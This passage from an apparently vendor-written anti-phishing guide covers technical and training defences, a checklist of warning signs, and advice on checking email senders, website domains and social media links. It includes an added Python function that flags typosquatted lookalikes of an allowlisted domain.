Enable anti-phishing protection built into modern browsers or install additional browser extensions for extra security. Subscribe to Threat Intelligence feeds to stay updated on phishing domains and campaigns.
To protect devices against malware infection through phishing attacks, use sandboxes to analyze the behavior of downloaded files in a virtualized environment, detect malicious activity, and act in time to prevent damage to your company. To inspect URLs when following links, deploy the following perimeter security solutions: SWG (secure web gateway), NGFW (next-generation firewall), SASE (secure access service edge), and similar tools. Use EDR (endpoint detection and response) solutions to detect and respond to events involving malicious activity on endpoints.
Limit employee access to only the information and systems they need for their work by applying the principle of least privilege. This reduces the chances of attackers accessing critical systems.
Create an incident response plan and regularly back up your data to ensure quick recovery in case of an attack.
Organizational measures
While technical defenses are essential, phishing attacks often rely on the human factor. That's why employee training is a vital part of any cybersecurity strategy.
Training should combine theory with practical exercises. You can organize courses internally through your IT team, hire external experts, or use online training programs.
As mentioned earlier, the more employees are exposed to phishing attempts, the better they become at identifying them. According to Hoxhunt, after six months of training, 50% of employees can spot phishing emails, compared to only 13% without training. Run regular simulated phishing campaigns to test your employees and identify areas where knowledge is lacking. These exercises help create a culture of cybersecurity and prepare employees to recognize real threats. Reviewing mistakes made during these tests is crucial for improving defenses. Since phishing tactics change frequently, keep simulations up to date so employees stay familiar with the latest methods attackers use.
Basic rules for protecting against phishing attacks
Despite their variety, phishing emails often share common warning signs. Follow these rules to recognize phishing emails and protect against an attack:
Stay calm. Do not give in to the emotions attackers try to provoke. Ask yourself:
- Was this email unexpected?
- Do I recognize the sender?
- Are there spelling or grammar mistakes? Does the design match the quality of the organization it claims to represent?
- Does the email trigger emotions like fear, curiosity, desire to help, or urgency? Does it make an offer that seems too good to be true?
- Are there links, attachments, or QR codes in the email?
- Is the email generic, with no personal greeting or details?
- Is the request in the email unusual or strange?
If you answer "Yes" to any of these questions, the email might be a phishing attempt. Take a moment to verify the information: call the sender using an official number, check the details through your personal account, and so on. Never share confidential information with third parties.
Emails
When you receive an email, in addition to using the checklist provided above, it's important to:
- Analyze the sender's details, including the email domain, name, and address.
- Verify that links lead to legitimate destinations by hovering over them with your cursor to check the actual URL.

Websites
To avoid falling victim to phishing websites, pay attention to:
- The website address and domain name. Check carefully for tricks like typosquatting, which exploits inattentiveness or haste. For example, instead of ptsecurity.com, attackers might use plsecurity.com, pt-security.com, pt.security.com, or ptsecurity.link.
- The presence of an SSL certificate (indicated by a padlock icon in the browser), the certificate owner, and the domain name registration date. You can use tools like WHOIS to verify this information.
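An added example, not from the report, that flags the four kinds of lookalike listed above against an allowlist of domains the organization owns (constructed here as ptsecurity.com only); it assumes single-label TLDs, so suffixes such as co.uk are not handled.

```python
import re

# Constructed allowlist of domains the organisation actually owns.
TRUSTED_DOMAINS = {"ptsecurity.com"}


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def stem_and_tld(host: str):
    """'pt.security.com' -> ('ptsecurity', 'com'): every label but the last, joined,
    with dots and hyphens removed so separator tricks collapse onto the brand name.
    Assumption: single-label suffixes only (no public-suffix list)."""
    labels = host.lower().strip(".").split(".")
    if len(labels) < 2:
        return labels[0], ""
    return re.sub(r"[^a-z0-9]", "", "".join(labels[:-1])), labels[-1]


def typosquat_verdict(host: str, trusted=TRUSTED_DOMAINS) -> dict:
    """Classify a host as trusted, one of the lookalike patterns, or unrelated."""
    host = host.lower().strip(".")
    for brand in trusted:
        if host == brand or host.endswith("." + brand):
            return {"host": host, "verdict": "trusted", "brand": brand}
    stem, tld = stem_and_tld(host)
    for brand in trusted:
        b_stem, b_tld = stem_and_tld(brand)
        if stem == b_stem and tld != b_tld:
            verdict = "different-tld"        # ptsecurity.link
        elif stem == b_stem:
            verdict = "inserted-separator"   # pt-security.com, pt.security.com
        elif levenshtein(stem, b_stem) <= 2:
            verdict = "lookalike"            # plsecurity.com
        elif b_stem in stem:
            verdict = "embedded-brand"       # ptsecurity-login.example
        else:
            continue
        return {"host": host, "verdict": verdict, "brand": brand}
    return {"host": host, "verdict": "unrelated", "brand": None}


if __name__ == "__main__":
    for h in ("ptsecurity.com", "plsecurity.com", "pt-security.com",
              "pt.security.com", "ptsecurity.link", "example.org"):
        print(typosquat_verdict(h))
```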
Social networks and messaging apps
To stay safe while using social media and messaging apps:
- Avoid clicking on unverified links or opening suspicious files.
- Limit the amount of personal information visible on your profile. The less data attackers have, the harder it is for them to craft a convincing phishing attack targeting you.
Don't reuse passwords across multiple accounts. If attackers gain access to one account, they could use the same credentials to compromise others. Make sure to regularly update your passwords and enable two-factor authentication (2FA). This adds an extra layer of protection in case your password is compromised.